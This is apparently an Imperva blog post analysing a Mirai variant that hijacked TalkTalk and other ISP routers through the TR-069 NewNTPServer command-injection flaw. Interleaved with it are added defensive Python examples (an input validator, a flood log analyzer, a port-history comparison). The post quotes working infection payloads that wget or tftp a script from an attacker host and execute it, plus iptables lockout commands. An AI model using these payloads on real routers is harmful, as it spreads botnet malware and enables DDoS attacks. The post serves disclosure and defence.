New Variant of Mirai Embeds Itself in TalkTalk Home Routers | Imperva

New Variant of Mirai Embeds Itself in TalkTalk Home Routers

It’s been over two months since Mirai source code was leaked on the HackForum, placing it into the hands of botnet herders around the world. What followed was a stream of reports about high-profile Mirai-powered DDoS attacks—including the takedown of Dyn DNS services. That one brought down many of the world’s most popular websites and services—Netflix, Twitter and Reddit among many.

Most recently, Mirai caused the mass shutdown of Deutsche Telekom routers, reportedly affecting over 900,000 DT customers. In that incident, a Mirai variant that had evolved from the original malware exploited a newly discovered TR-069 protocol vulnerability (EDB-ID: 40740) to hijack network routers.

Following the assault, DT issued an emergency patch that hopefully solved the issue for the majority of its customers. Just a few days later, however, we found ourselves face-to-face with a similar router-based Mirai botnet, this time operating out of the UK.

The record of this attack underlines the fact that the new TR-069 vulnerability, and the malware variants that exploit it, pose a threat to customers of ISPs around the world.

Mirai and the TR-069 Vulnerability

TR-069 (a.k.a., CPE WAN Management Protocol, or CWMP) is a widely used protocol many ISPs employ to remotely manage network routers. Its communication occurs on port 7547, to which remote commands are sent. One such command is Time/SetNTPServers, used to synchronize a router with an external time source.

However, the value passed with this same command can be manipulated to make the router execute attacker-supplied bash commands. Among other things, this enables attackers to:

  • Open port 80 for remote access.
  • Obtain Wi-Fi passwords.
  • Modify the iptable rules.
  • Inject malware into the device.

A few weeks after the TR-069 vulnerability was made public, cyber journalists at BadCyber documented an even newer Mirai variant that was downloading itself onto routers using wget and tftp commands.

cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh
<NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1>
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
Source: BadCyber
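The payloads above work because the NewNTPServer value is spliced into a shell command instead of being treated as a hostname. The following is an added example (not code from the article or from any router firmware) of how a CWMP handler should validate that parameter and hand it to a program without a shell; `ntpclient -h` is a hypothetical command used only to illustrate the argv construction.

```python
import ipaddress
import re
from typing import List, Optional

# RFC 1123 hostname label: 1-63 alphanumerics or hyphens, no leading/trailing hyphen.
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
# Characters that carry meaning for `sh -c`; none of them belong in a hostname.
_SHELL_META = set("`$;|&<>(){}\n\r ")


def reject_reason(value: str) -> Optional[str]:
    """Return None if `value` is an acceptable NTP server (IP address or hostname),
    otherwise a short reason suitable for a log line or a CWMP fault response."""
    if not value:
        return "empty value"
    if len(value) > 253:
        return "too long for a hostname"
    if any(ch in _SHELL_META for ch in value):
        return "shell metacharacter or whitespace"
    try:
        ipaddress.ip_address(value)  # bare IPv4 / IPv6 literal is fine
        return None
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    if all(_LABEL_RE.match(label) for label in labels):
        return None
    return "not a hostname or IP address"


def is_valid_ntp_server(value: str) -> bool:
    return reject_reason(value) is None


def ntp_sync_argv(value: str) -> List[str]:
    """Build the sync command as an argv list for subprocess.run(argv, shell=False).

    `ntpclient -h <server>` is a hypothetical command (assumption, not a real
    firmware call). The point is that the validated value becomes exactly one
    argument and no shell ever parses it, so `;`, backticks and `&&` are inert.
    A leading hyphen is also rejected by the label rule, which blocks option
    injection against the program itself.
    """
    reason = reject_reason(value)
    if reason is not None:
        raise ValueError(f"NewNTPServer rejected: {reason}")
    return ["ntpclient", "-h", value]


if __name__ == "__main__":
    for candidate in ("pool.ntp.org", "192.168.1.1", "`cd /tmp;wget http://l.ocalhost.host/1`"):
        print(repr(candidate), "->", reject_reason(candidate) or "accepted")
```

The reject reason is worth logging: a burst of "shell metacharacter" rejections on port 7547 is itself a detection signal that someone is probing the CPE for this flaw.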

Like the legacy Mirai malware, this variant is also programmed to “close the door” after injecting itself into a device. To do so, it runs the following command, making port 7547 unavailable until the next reboot.

busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
busybox killall -9 telnetd
Source: BadCyber

At the time of the discovery, over five million devices made their TR-069 interface available to the outside world. Serendipitously, the study was published the same day DT routers started to go down.

Meanwhile in the UK…

As DT was recovering from its Mirai encounter, on December 5th a UK-based bitcoin company website using the Incapsula service was hit with a slew of GET and POST flood attacks, which were still ongoing at the time of writing.

Figure 1: HTTP flood, peaking at 8,674 RPS

The attack peaked at over 8,600 RPS (requests per second), then scaled back to a steady flow of 200 to 1,000 RPS directed at two specific pages on our client’s website.

The offenders’ persistence, as well as their choice of targets, shows this to be a premeditated offensive rather than the typical random burst launched from a rented DDoS-for-hire service.

Figure 2: One of the attacking bots, running on BusyBox

The assault was executed by DDoS bots running on BusyBox, using “Anus” as their user-agent of choice. We’re unsure why the attackers chose this specific moniker, but some stones are better left unturned.
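The three signals described so far (peak request rate, a handful of targeted pages, and an unusual user-agent shared by many sources) can be pulled out of ordinary web server logs. The following is an added example, not part of the article or of Incapsula, that does this over a few constructed Combined Log Format lines; the IP addresses, paths and timestamps are made up for the demonstration.

```python
import re
from collections import Counter
from datetime import datetime
from typing import Dict, List

# Combined Log Format: ip ident user [ts] "METHOD path proto" status bytes "referer" "user-agent"
_CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines; not traffic from the incident described in the post.
SAMPLE_LOG = """\
198.51.100.10 - - [05/Dec/2016:10:00:00 +0000] "GET /login HTTP/1.1" 200 512 "-" "Anus"
198.51.100.11 - - [05/Dec/2016:10:00:00 +0000] "POST /login HTTP/1.1" 200 512 "-" "Anus"
198.51.100.12 - - [05/Dec/2016:10:00:00 +0000] "GET /trade HTTP/1.1" 200 512 "-" "Anus"
198.51.100.13 - - [05/Dec/2016:10:00:00 +0000] "GET /trade HTTP/1.1" 200 512 "-" "Anus"
198.51.100.14 - - [05/Dec/2016:10:00:00 +0000] "POST /login HTTP/1.1" 200 512 "-" "Anus"
198.51.100.10 - - [05/Dec/2016:10:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Anus"
198.51.100.12 - - [05/Dec/2016:10:00:01 +0000] "GET /trade HTTP/1.1" 200 512 "-" "Anus"
203.0.113.7 - - [05/Dec/2016:10:00:01 +0000] "GET /about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.15 - - [05/Dec/2016:10:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "Anus"
"""


def parse_clf(text: str) -> List[dict]:
    """Parse CLF lines into dicts with a per-second bucket; unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = _CLF_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["second"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(microsecond=0)
        records.append(rec)
    return records


def analyze_flood(text: str, suspect_ua: str, rps_threshold: int = 3) -> Dict[str, object]:
    """Summarise a log: peak RPS, which pages the suspect user-agent hammers,
    and how many distinct sources share that user-agent (a botnet tell)."""
    records = parse_clf(text)
    per_second = Counter(r["second"] for r in records)
    peak_second, peak_rps = max(per_second.items(), key=lambda kv: kv[1])
    suspect = [r for r in records if r["ua"] == suspect_ua]
    return {
        "peak_rps": peak_rps,
        "peak_second": peak_second.isoformat(),
        "flagged": peak_rps >= rps_threshold,
        "suspect_requests": len(suspect),
        "suspect_ips": sorted({r["ip"] for r in suspect}),
        "targeted_paths": Counter(r["path"] for r in suspect).most_common(),
    }


if __name__ == "__main__":
    for key, val in analyze_flood(SAMPLE_LOG, "Anus").items():
        print(f"{key}: {val}")
```

On real logs the `rps_threshold` should be set relative to the site's normal baseline, and the `suspect_ips` list is what you would feed into a geolocation lookup to spot the regional concentration discussed next.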

Infinitely more interesting was the botnet devices’ geolocation. As seen in the image below, all of the 2,398 attacking IPs were located in the UK.

Figure 3: Geolocations of the botnet devices

This kind of IP distribution is uncommon for DDoS botnets. Typically it indicates a vulnerability in a device supplied by local retailers, which allows for such a regional botnet to appear.

In this case, a quick scan revealed a horde of malware-infected home routers, over 99 percent of which belonged to the TalkTalk Telecom network. So we had our device and our distributor.

But a question remained: How were these routers compromised?

We nearly ruled out TR-069, as none of the random IP scans found any devices with port 7547 open. However, when we fed the same addresses into Shodan, we discovered that these ports had been open until a few days earlier.

This gave us not only the smoking gun but also the possible identity of the culprit. Matching the MO described in BadCyber’s post, this was a sign of the same Mirai variant nesting itself in the device and then shutting the door behind it.

Figure 4: Shodan’s cache shows the port open on November 30

Figure 5: Our scan shows the port closed on December 6
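The comparison behind Figures 4 and 5 is a simple join: for each attacking IP, was TCP/7547 open in the historic view and is it closed now? The following is an added example (not the article's or Incapsula's code) that buckets the attacking addresses by that transition; the IP addresses and both snapshots are constructed, with the historic dict standing in for a Shodan cache and the current dict for a fresh scan.

```python
from typing import Dict, Iterable, Set

# Constructed data, not the article's scan results.
# IPs seen participating in the flood.
ATTACK_IPS = {"198.51.100.10", "198.51.100.11", "198.51.100.12", "198.51.100.13", "198.51.100.14"}
# Historic view (e.g. a Shodan cache from Nov 30): ip -> was TCP/7547 open?
HISTORIC_7547 = {"198.51.100.10": True, "198.51.100.11": True, "198.51.100.12": True,
                 "198.51.100.14": False, "203.0.113.99": True}
# Current view (e.g. our own scan on Dec 6): ip -> is TCP/7547 open now?
CURRENT_7547 = {"198.51.100.10": False, "198.51.100.11": False, "198.51.100.12": True,
                "198.51.100.13": False, "198.51.100.14": False, "203.0.113.99": True}


def corroborate(attack_ips: Iterable[str], historic: Dict[str, bool],
                current: Dict[str, bool]) -> Dict[str, Set[str]]:
    """Bucket attacking IPs by what happened to their TR-069 port.

    closed_since_cache: open before, closed now -> consistent with the variant's
                        "close the door" behaviour; candidates for infection.
    still_open:         exposed before and now -> still vulnerable, patch first.
    never_open:         no TR-069 exposure in either view -> another infection vector.
    no_history:         not in the historic view -> cannot say anything.
    An IP missing from the current scan is treated as closed.
    """
    buckets = {"closed_since_cache": set(), "still_open": set(),
               "never_open": set(), "no_history": set()}
    for ip in attack_ips:
        if ip not in historic:
            buckets["no_history"].add(ip)
        elif historic[ip] and not current.get(ip, False):
            buckets["closed_since_cache"].add(ip)
        elif historic[ip]:
            buckets["still_open"].add(ip)
        else:
            buckets["never_open"].add(ip)
    return buckets


def closure_ratio(buckets: Dict[str, Set[str]]) -> float:
    """Share of attacking IPs with history whose port went from open to closed."""
    known = (len(buckets["closed_since_cache"]) + len(buckets["still_open"])
             + len(buckets["never_open"]))
    return len(buckets["closed_since_cache"]) / known if known else 0.0


if __name__ == "__main__":
    b = corroborate(ATTACK_IPS, HISTORIC_7547, CURRENT_7547)
    for name, ips in b.items():
        print(f"{name}: {sorted(ips)}")
    print(f"closure ratio: {closure_ratio(b):.2f}")
```

A high closure ratio across a regional botnet is the pattern the article describes; the `still_open` bucket is the list an ISP should push a fix to first, since those devices are both attacking and still reachable on 7547.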

ISPs’ Responsibilities

Without full access to the infected routers, it’s difficult to know with certainty whether the malware used to execute this attack was the same Mirai variant used against Deutsche Telekom or the one encountered by the BadCyber researchers.

That said, every minor source code modification breeds a new Mirai “mutation,” making these nuances almost beside the point. What’s important to note is that these attacks are enabled by the same vulnerability in ISP distributed routers.

We hope that the accumulated reports of the attacks will serve as a wakeup call for ISPs using routers susceptible to the vulnerability in the TR-069 protocol.

With variants of Mirai already leveraging the exploit for large-scale attacks, it’s time for ISPs to proactively assume responsibility and issue emergency patches. Doing so will not only protect the privacy of their customers but also prevent their routers from falling into the hands of botnet operators, who would use them to endanger the internet ecosystem.

Not long after this story was written, TalkTalk became aware of the situation and issued a fix for the vulnerability that closes the TR-069 interface and resets the router.

In the following days we saw the number of attacking IPs decrease until only 259 devices were participating in the attack.

We encourage other ISPs to follow suit.

Impacted Vendors and Devices

(This list is probably not complete.)

Arcadyan ADSL Router
Aztech DSL5001
Aztech DSL5005
Aztech DSL5008
Aztech DSL5018EN
Aztech DSL5068EN(1T1R)
Aztech RAW300-USB
Aztech Technologies Pte. Ltd. 700WR
Aztech Technologies Pte. Ltd. DSL5028EN(1T1R)
Aztech Technologies Pte. Ltd. DSL5028EN(2T2R)
Aztech Technologies Pte. Ltd. RAW300L-A05
BEC 6300NEL R10
BEC 6300VNL R4
BEC 6300VNL R5
BEC 6300VNL R6
BEC 9800VN
Billion BiPAC 4500VNOZ
Billion BiPAC 6300NX
Billion BiPAC 6300NXL
Billion BiPAC 6801VNL
Billion BiPAC 7300WR2
Billion BiPAC 8300NL
Billion BiPAC 8400NLR2
Billion BiPAC 8400NL-T R2
Binatone Binatone Router Adsl Router
Binatone DT820
Binatone DT 820
Binatone DT845W
Binatone DT850W
Binatone DT850W DSL Gateway
Binatone DT850W(HFCL)
Binatone DT860W
BiPAC 8300NL
Comtrend VR-3041u
Digicom RAW150-A02
Digicom RAW150-A03
Digicom RAW300-A01
Digicom RAW300U-A02
D-Link DSL-2875AL
D-Link DSL-2877AL
D-Link DSL-3780
D-Link DSL-3782
D-Link DSL-3882
DT Speedport Entry SPW505V
Gateway Prestige 660HNU-T1
iBall iB-WRA150N DSL-Gateway
ITI Ltd. DNA-1051
ITI Ltd. DNA-2012
ITI Ltd. DNA-2013
MitraStar DSL-100HN-T1-GV
MitraStar DSL-100HN-T1-NV
MitraStar DSL-100HN-T1v4
MitraStar DSL-2401HN-T1C
MitraStar DSL-2401HN-T1C-GV
MitraStar DSL-2401HN-T1C-NV
MitraStar HGW-2501GNP-NV
Supernet DSLW200
Supernet DSLW200 ADSL2+W2
T-Com. Speedport W303V
T-Com. Speedport W303V DTW303VA
T-Com. Speedport W 303V Typ A DTW303VA
T-Com. Speedport W 502V Typ A DTW502A
T-Com. Speedport W 503V Typ C DTW503VA
T-Com. Speedport W700V DTW7V
T-Com. Speedport W720V DTW72V
T-Com. Speedport W722V DTW722V
Teracom TDSL300W2 ADSL2+W2
T-Home Speedport W 504V Typ A DTW504VA
T-Home Speedport W 723V Typ B DTW723VA
T-Home Speedport W 921V DTW921V
TP-LINK TD-W8951ND DSL-Gateway
Upvel LLC. 354AN4G
Upvel LLC. UR-314AN4G
Upvel LLC. UR-354AN4G
ZTE ZXV10 W300
ZyXEL AMG1001-T10A
ZyXEL AMG1201-T10A
ZyXEL AMG1202-T10A
ZyXEL AMG1202-T10B
ZyXEL AMG1302-T10A
ZyXEL AMG1302-T10B
ZyXEL AMG1302-T11B
ZyXEL AMG1302-T11C
ZyXEL AMG1312-T10B
ZyXEL DEL1201-T10A
ZyXEL DEL1202-T10B/B
ZyXEL DEL1202-T10B/W
ZyXEL DEL1312-T10B
ZyXEL eircom D1000 Modem P-660HNU-T1 v2
ZyXEL eir D1000 Modem P-660HNU-T1 v2
ZyXEL P-1202-T10B
ZyXEL P-1302-T10B
ZyXEL P-1302-T10D
ZyXEL P-1302-T10D v2
ZyXEL P-1302-T10D v3
ZyXEL P660HN Lite EE
ZyXEL P-660HN-T1A_IPv6
ZyXEL P-660HN-T1A v2
ZyXEL P-660HN-T1H_IPv6
ZyXEL P-660HN-T1_IPv6
ZyXEL P-660HN-T1 v2
ZyXEL P-660HN-T3A_IPv6
ZyXEL P-660HNU-T1_IPv6
ZyXEL P-660HNU-T1 Prestige 660HNU-T1
ZyXEL P-660HNU-T3_IPv6
ZyXEL P-660H-T1 Prestige 660H-T1
ZyXEL P-660H-T1v3s
ZyXEL P-660HU-T1 Prestige 660HU-T1
ZyXEL P-660N-T1A
ZyXEL P-660R-T1
ZyXEL P-660R-T1 v3
ZyXEL P-660R-T1v3s
ZyXEL P-660R-T1 v3s
ZyXEL P-660R-T3-v3s